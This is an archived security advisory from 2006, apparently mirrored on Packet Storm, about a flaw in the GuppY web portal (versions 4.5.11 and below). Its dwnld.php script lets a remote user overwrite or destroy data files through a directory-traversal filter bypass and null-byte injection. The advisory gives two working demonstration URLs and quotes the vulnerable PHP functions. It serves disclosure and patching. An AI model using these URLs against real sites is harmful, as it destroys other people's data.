exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

guppyDoS.txt

guppyDoS.txt
Posted Mar 11, 2006
Authored by trueend5 | Site kapda.ir

There is a high risk vulnerability in Guppy versions 4.5.11 and below that will allow remote attackers to destroy database files. Details provided.

tags | exploit, remote
SHA-256 | a56334d59160722210ec923946ac49e919e81d4c1acbc090031cf3742db3b438

guppyDoS.txt

Change Mirror Download
KAPDA New advisory

Vendor: http://www.freeguppy.org
Vulnerable: <= 4.5.11
Bug: Destroy database files (Remote DoS vulnerability)
Exploitation: Remote with browser
Exploit: available

Description:
--------------------
GuppY is a web portal intentionaly designed to be easy
to use for you,
the final user. It doesn't require any database to
run. It allows you
to create quickly and without any technical knowledge,
a complete and
interactive website.

Vulnerability:
--------------------

There is a high risk vulnerability in guppy <= 4.5.11
in 'dwnld.php'pages that may
allow remote attackers to destroy database files.(With
magic_quotes_gpc = Off
,Its possible to destroy any file that chmoded 666 via
null injection).
Furthermore, directory traversal filter bypassing,
using
%2E./ instead of ../

Demonstration URL:
--------------------
http://example.com/guppy/mobile/dwnld.php?pg=./%2E./stats
will replace content of stats.dtb with "1"
Or
http://example.com/guppy/dwnld.php?pg=./%2E./test.inc%00

Code Snippets:
--------------------
//dwnld.php
$dnldcounter = ReadDocCounter(DBBASE.$pg);
UpdateDocCounter($pg);

//log.inc
}
WriteDBFields(DBLOGH,$dblog);
}
$tabcounter = CompteVisites(DBIPSTATS, DBSTATS);
if ($tabcounter[0] > 0 && ($tabcounter[0]/10) ==
intval($tabcounter[0]/10)) {
WriteCounter(DBSTATSBK, $tabcounter[0]);
}


//functions.php
function WriteCounter($fic,$DataDB) {
$fhandle = fopen($fic, "w");
fputs($fhandle, $DataDB."\n");
fclose($fhandle);
}
.
.
.
function WriteDBFields($fic,$Fields) {
$fhandle = fopen($fic, "w");
$DataDB = "";
for ($i = 0; $i < count($Fields); $i++) {
for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
$DataDB .= trim($Fields[$i][$j]).CONNECTOR;
}
$DataDB .=
trim($Fields[$i][count($Fields[$i])-1])."\n";
}
fputs($fhandle, $DataDB);
fclose($fhandle);
}
.
.
.
function ReadDocCounter($dirid) {
$DataDB = ReadCounter($dirid.DBEXT);
return $DataDB;
}

function WriteDocCounter($dirid,$DataDB) {
WriteCounter($dirid.DBEXT,$DataDB);
}

function UpdateDocCounter($id) {
$DataDB = ReadDocCounter(DBBASE.$id);
$vote = DejaVote(DBIPBASE.$id.DBEXT,300);
if ($vote[0] == false) {
$DataDB++;
WriteDocCounter(DBBASE.$id,$DataDB);
}
return $DataDB;
}

More details with Exploit:
--------------------
http://www.kapda.ir/advisory-291.html
In Farsi: http://irannetjob.com/content/view/204/28/

Solution:
--------------------
Upgrade to new version 4.5.12

Credit :
--------------------
Discovered by trueend5 (trueend5 kapda ir)
Computer Security Science Researchers Institute
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close